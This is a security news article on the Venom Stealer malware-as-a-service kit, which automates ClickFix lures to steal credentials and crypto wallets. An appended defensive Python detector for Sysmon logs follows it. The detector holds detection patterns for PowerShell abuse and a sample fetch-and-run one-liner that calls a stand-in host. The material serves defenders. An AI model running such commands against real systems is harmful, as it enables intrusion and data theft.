- What: Venom Stealer MaaS platform enables ClickFix attacks
- Impact: Operators with no malware-development skill can run persistent, automated campaigns that steal credentials, session cookies, and cryptocurrency wallet data
News: Venom Stealer MaaS Platform Commoditizes ClickFix Attacks

A new service on the cybercrime market provides automated capabilities to create persistent information-stealing social engineering attacks.

Elizabeth Montalbano, Contributing Writer
April 1, 2026
4 Min Read

Developing ClickFix-style attacks has just gotten much easier, thanks to a newly distributed malware-as-a-service (MaaS) platform that automates every step of the social engineering technique for would-be attackers, researchers have found.

A developer operating under the name "VenomStealer" is selling a MaaS platform of the same name on cybercriminal forums and networks, researchers from BlackFog revealed in a report published Tuesday. Venom Stealer allows attackers to create a persistent, multistage pipeline from initial infection to credential theft, cryptocurrency wallet access, and data exfiltration based on the initial ClickFix interaction.

"Venom stands out from commodity stealers like Lumma, Vidar, and RedLine because it goes beyond credential harvesting," BlackFog founder and CEO Darren Williams wrote in the report. "It builds ClickFix social engineering directly into the operator panel, automates every step after initial access, and creates a continuous exfiltration pipeline that does not end when the initial payload finishes running."

Touted on cybercriminal forums as "the Apex Predator of Wallet Extraction," the platform is sold on a subscription basis for $250 a month, or $1,800 for lifetime access, according to Williams. There is a vetted application process, Telegram-based licensing, and a 15% affiliate program for Venom Stealer, which delivers a native C++ binary payload compiled per-operator from the web panel.
Unlike traditional stealers that simply execute once, exfiltrate data, and exit, Venom Stealer continuously scans the system to harvest credentials, session cookies, and browser data; targets cryptocurrency wallets and stored secrets; and automates wallet cracking and fund draining, according to BlackFog's report.

Moreover, despite its relatively new presence on the commodity MaaS market, the operation behind Venom Stealer already appears to be a thriving business, Williams noted. In the month of March alone, its developer has already shipped multiple updates to the platform.

Step-By-Step ClickFix by Design

An attack built with Venom Stealer begins when a prospective victim lands on a ClickFix page hosted by the operator. The platform ships four templates per platform (Windows and macOS): a fake Cloudflare CAPTCHA, a fake OS update, a fake SSL certificate error, and a fake font install page. Each one asks the target to open a Run dialog or Terminal, copy and paste a command, and hit Enter.

"Because the target initiates execution themselves, the process appears user-initiated and bypasses detection logic built around parent-child process relationships," Williams explained.

Windows payloads available in the kit include .exe, .ps1 (or fileless via PowerShell), .hta, and .bat options, while macOS templates use bash and curl, he said. The platform also gives operators the capability to configure custom domains through Cloudflare DNS, so the panel URL never appears in the command.

Once the payload executes, it sweeps every Chromium and Firefox-based browser on the machine, extracting saved passwords, session cookies, browsing history, autofill data, and cryptocurrency wallet vaults from every profile.
Moreover, there are evasion capabilities built into the execution mode, with the password encryption in versions 10 and 20 of Chrome bypassed using a silent privilege escalation that extracts the decryption key without triggering any user account control (UAC) dialog, thus leaving no forensic artifacts, Williams noted. The attack chain also captures system fingerprinting and browser extension inventories alongside the credentials, giving cybercriminals a complete profile of each target, he added.

"All of this data leaves the infected device immediately, with little or no local staging or delay," Williams wrote. "Without adequate visibility into outbound traffic, detecting this activity becomes significantly more difficult."

Persistent Data-Theft Pipeline

The attack transfers any discovered wallet data to a server-side, GPU-powered cracking engine that auto-cracks crypto wallets such as MetaMask, Phantom, Solflare, Trust Wallet, Atomic, Exodus, Electrum, Bitcoin Core, Monero, and Tonkeeper. Additionally, a March 9 update to Venom Stealer added a File Password and Seed Finder, which searches the filesystem for locally saved seed phrases, feeding anything found into the cracking pipeline.

"Even targets who avoid saving credentials in their browser are at risk if seed phrases exist anywhere on the machine," Williams wrote.

And while some newer infostealer variants do have some persistence capability, Venom goes further than them all by staying active after the initial compromise and continuously monitoring Chrome's Login Data, capturing newly saved credentials in real time, he added.

"This undermines credential rotation as an incident response measure and extends the exfiltration window beyond the initial infection," Williams observed. "As a result, determining the full scope of the ongoing compromise becomes more difficult."
How to Reduce ClickFix Exposure

Researchers from Proofpoint first spotted ClickFix attacks about two years ago, and the technique has taken off with the cybercriminal community since then. The attack instills urgency among targets by telling them something is wrong that they must fix or update, and then uses otherwise benign CAPTCHA-style prompts to lure them into a false sense of security. The aim is to trick a user into executing malicious prompts against themselves.

Organizations can reduce exposure to threats like Venom Stealer by restricting PowerShell execution, disabling the Run dialog for standard users via Group Policy, and training employees to recognize ClickFix-style social engineering, Williams advised.

"Once the payload is running, the attack chain depends on data leaving the device," he wrote. "Monitoring and controlling outbound traffic become important at this point, because it provides an opportunity to detect or prevent exfiltration activity and limit the impact of credential theft and subsequent actions."
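The two detection points the article raises (a pasted Run-dialog command that hides behind a user-initiated parent process, and the outbound traffic that every later stage depends on) can be covered with one piece of endpoint-log logic. The following is an added example written for this page, not code from BlackFog, Dark Reading, or the Venom Stealer report. It assumes Sysmon process-creation (EventID 1) and network-connection (EventID 3) records rendered as JSON lines with Sysmon's field names; the sample events, process GUIDs such as `{A1}`, the host name `lure.invalid`, the path `svc.exe`, and the destination addresses are all constructed for the example.

```python
"""Flag ClickFix-style pasted commands and the outbound connections of their process tree.

Added example for this article, not the vendor's or the publication's code.
Input: Sysmon events as JSON lines, chronologically ordered, using Sysmon's
field names (EventID, ProcessGuid, ParentProcessGuid, Image, ParentImage,
CommandLine, DestinationIp, DestinationPort). Field layout is an assumption:
real forwarders (Winlogbeat, NXLog, etc.) nest or rename these.
"""
import ipaddress
import json
import re
from pathlib import PureWindowsPath

# Interpreters a pasted Run-dialog command typically launches on Windows.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "curl.exe"}

# The Run dialog (Win+R) launches its child under explorer.exe, which is exactly
# why parent/child rules tuned for Office or browser parents miss it.
USER_INITIATED_PARENTS = {"explorer.exe"}

# Command-line traits of one-liners pasted by the victim: encoded payload,
# hidden window, in-memory execution, fetch from a URL.
SUSPICIOUS_ARGS = {
    "encoded-command": re.compile(r"(?<![\w-])-(?:e|ec|enc|encodedcommand)\s", re.I),
    "hidden-window":   re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "in-memory-exec":  re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "remote-fetch":    re.compile(r"\b(?:iwr|invoke-webrequest|curl|wget|certutil)\b.*?https?://", re.I),
    "mshta-url":       re.compile(r"\bmshta(?:\.exe)?\s+\S*https?://", re.I),
}

# Destinations treated as internal; everything else counts as "leaving the device".
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def basename(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return PureWindowsPath(path).name.lower()


def classify_process_event(ev):
    """Return the reasons an EventID 1 record looks like a pasted ClickFix command.

    An empty list means benign: e.g. an admin opening PowerShell from the Run
    dialog with no arguments still has explorer.exe as parent but trips nothing.
    """
    if ev.get("EventID") != 1:
        return []
    if basename(ev.get("Image", "")) not in SCRIPT_HOSTS:
        return []
    if basename(ev.get("ParentImage", "")) not in USER_INITIATED_PARENTS:
        return []
    cmd = ev.get("CommandLine", "")
    return [name for name, rx in SUSPICIOUS_ARGS.items() if rx.search(cmd)]


def is_external(ip):
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return not any(addr in net for net in INTERNAL_NETS)


def analyze(lines):
    """Single pass over ordered JSON-lines events.

    Every process descended from a flagged pasted command inherits its taint, so
    a later EventID 3 connection from that tree to an external address is
    reported as candidate exfiltration even if the connecting binary is new.
    """
    tainted = set()          # ProcessGuids in a flagged process tree
    initial_access, exfil = [], []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        eid = ev.get("EventID")
        if eid == 1:
            reasons = classify_process_event(ev)
            if reasons:
                tainted.add(ev["ProcessGuid"])
                initial_access.append({"guid": ev["ProcessGuid"],
                                       "cmd": ev["CommandLine"], "reasons": reasons})
            elif ev.get("ParentProcessGuid") in tainted:
                tainted.add(ev["ProcessGuid"])   # child of a flagged chain
        elif (eid == 3 and ev.get("ProcessGuid") in tainted
              and is_external(ev.get("DestinationIp", ""))):
            exfil.append({"guid": ev["ProcessGuid"],
                          "image": basename(ev.get("Image", "")),
                          "dst": f'{ev["DestinationIp"]}:{ev.get("DestinationPort")}'})
    return {"initial_access": initial_access, "exfil": exfil}


# Constructed sample log: one pasted lure, its dropped child, two connections
# from that child (one internal, one external), plus two benign events.
SAMPLE_EVENTS = r'''
{"EventID": 1, "ProcessGuid": "{A1}", "ParentProcessGuid": "{E0}", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell -w hidden -c \"iex (iwr http://lure.invalid/v)\""}
{"EventID": 1, "ProcessGuid": "{B2}", "ParentProcessGuid": "{A1}", "Image": "C:\\Users\\alice\\AppData\\Local\\Temp\\svc.exe", "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "\"C:\\Users\\alice\\AppData\\Local\\Temp\\svc.exe\""}
{"EventID": 1, "ProcessGuid": "{C3}", "ParentProcessGuid": "{E0}", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\""}
{"EventID": 3, "ProcessGuid": "{B2}", "Image": "C:\\Users\\alice\\AppData\\Local\\Temp\\svc.exe", "DestinationIp": "10.0.0.5", "DestinationPort": 445}
{"EventID": 3, "ProcessGuid": "{B2}", "Image": "C:\\Users\\alice\\AppData\\Local\\Temp\\svc.exe", "DestinationIp": "203.0.113.10", "DestinationPort": 443}
{"EventID": 3, "ProcessGuid": "{D4}", "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "DestinationIp": "203.0.113.20", "DestinationPort": 443}
'''

if __name__ == "__main__":
    print(json.dumps(analyze(SAMPLE_EVENTS.splitlines()), indent=2))
```

Run stand-alone, the script reports one initial-access hit (the hidden-window, in-memory, remote-fetch PowerShell one-liner under explorer.exe) and one candidate exfiltration (the dropped `svc.exe` reaching 203.0.113.10:443); the bare PowerShell launch and the browser's own connection are not reported. In a real pipeline the taint set and the command-line patterns are the parts to tune: the article's macOS templates (curl piped to bash from Terminal) need an equivalent parent set and a `curl ... | bash` pattern, and the Group Policy and PowerShell restrictions the article recommends shrink the set of hosts these rules ever fire on.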